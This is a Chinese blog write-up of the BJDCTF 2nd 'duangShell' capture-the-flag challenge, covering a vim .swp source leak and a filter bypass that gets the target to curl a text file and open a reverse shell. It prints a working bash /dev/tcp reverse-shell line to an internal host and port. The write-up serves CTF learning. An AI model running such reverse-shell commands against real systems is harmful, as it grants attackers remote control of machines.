[BJDCTF 2nd]duangShell(反弹shell,swp泄露)

本文介绍了BJDCTF比赛中遇到的duangShell挑战,涉及swp文件泄露和反弹shell技术。通过分析swp文件的生成原理,讨论了如何利用vim的swp文件进行信息泄露。接着详细阐述了反弹shell的过程,包括内网机子的ip获取、端口监听、数据post以及绕过过滤的方法。最终,通过创建txt文件并让题目机执行访问,成功实现内网机的反弹shell,从而找到flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

进入题目:
在这里插入图片描述
swp文件,我第一次做CTF的时候就是swp泄露:[2019EIS高校运维赛]ezupload

swp文件: 非正常关闭vi/vim编辑器时会生成一个.swp文件 关于swp文件
使用vi/vim,经常可以看到swp这个文件,那这个文件是怎么产生的呢,当你打开一个文件,vi就会生成这么一个.(filename)swp文件
以备不测(不测下面讨论),如果你正常退出,那么这个这个swp文件将会自动删除 。

用vim打开:
在这里插入图片描述
exec():
在这里插入图片描述
命令执行,但是过滤掉了好多常用的字眼,关键是还过滤了$,难顶,不会,看wp:
在这里插入图片描述
反弹shell?那是什么东西:
https://www.freebuf.com/articles/system/178150.html

回归正题:

这题反弹shell就是说:从题目的机子,也就是duangshell,发送请求到buu内网的机子,然后buu内网的机子就可以直接在duangshell题目的机子执行命令,从而拿到flag。

步骤:
先在别的浏览器开个buu小号,然后开个内网机子:
在这里插入图片描述
在这里插入图片描述
xshell连上,因为反弹shell需要知道内网的ip地址,所以先ifconfig一下:
在这里插入图片描述
然后监听任意没被占用的端口:
在这里插入图片描述
然后在题目中post数据:
在这里插入图片描述
然后:
在这里插入图片描述
嗷,我忘了他有过滤,然后又利用python命令反弹,虽然没有被正则匹配到,但是内网机子nc不到任何请求,原因不知,可能因为没有py环境?

通过wp我知道了,可以在内网机子新建一个含有bash -i >& /dev/tcp/174.0.207.178/4444 0>&1的txt文件,然后通过duangshell题目执行curl来访问txt文件的内容,从而使内网机子获取反弹shell。神奇。
在这里插入图片描述
保存,post女朋友进去:
在这里插入图片描述
find flag即可。
在这里插入图片描述
在这里插入图片描述
又学到了好多东西,goodgood。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值